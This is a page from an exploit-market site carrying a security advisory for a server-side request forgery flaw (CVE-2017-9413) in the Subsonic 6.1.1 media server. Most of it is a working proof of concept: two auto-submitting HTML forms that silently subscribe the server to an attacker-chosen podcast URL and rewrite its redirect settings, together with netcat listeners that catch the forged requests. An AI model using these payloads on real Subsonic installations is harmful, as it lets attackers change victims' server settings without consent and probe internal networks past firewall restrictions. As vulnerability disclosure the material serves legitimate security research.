[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Subsonic 6.1.1 - Server-Side Request Forgery Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Low
]
0day-ID
0day-ID-27891
Category
web applications
Date add
05-06-2017
CVE
CVE-2017-9413
Platform
windows
[+] Credits: John Page a.k.a hyp3rlinx  
 
Vendor:
================
www.subsonic.org
 
 Product:
===============
subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 
  
Vulnerability Type:
==================================
CSRF - Server Side Request Forgery
 
  
CVE Reference:
==============
CVE-2017-9413
 
 
 
Security Issue:
================
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network 
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
bypass Firewall restriction on LAN.
 
e.g
 
nc.exe -llvp 1337
listening on [any] 1337 ...
 
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
 
 
Exploit/POC:
=============
nc.exe -llvp 1337
listening on [any] 1337 ...
 
 
1) Subscribe to Podcast CSRF Persistent SSRF
 
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
<input type="text" name="add" value="http://127.0.0.1:1337">
<input type="submit" value="OK">
<script>document.forms[0].submit()</script>
</form>
 
 
nc.exe -llvp 5555
listening on [any] 5555 ...
 
 
2) Interet Radio Settings CSRF Persistent SSRF
 
<form  action="http://localhost:4040/networkSettings.view" method="post">
<input name="portForwardingEnabled" type="hidden" value="true"/>
<input type="hidden" name="_portForwardingEnabled" value="on"/>
<input  name="urlRedirectionEnabled" type="hidden" value="true" />
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
<input  name="urlRedirectType" type="radio" value="NORMAL"/>
<input  name="urlRedirectFrom" type="radio" value="yourname"/>
<input  name="urlRedirectType"  type="radio" value="CUSTOM" checked="true" />
<input  name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
<script>document.forms[0].submit()</script>
</form>

#  0day.today [2024-12-24]  #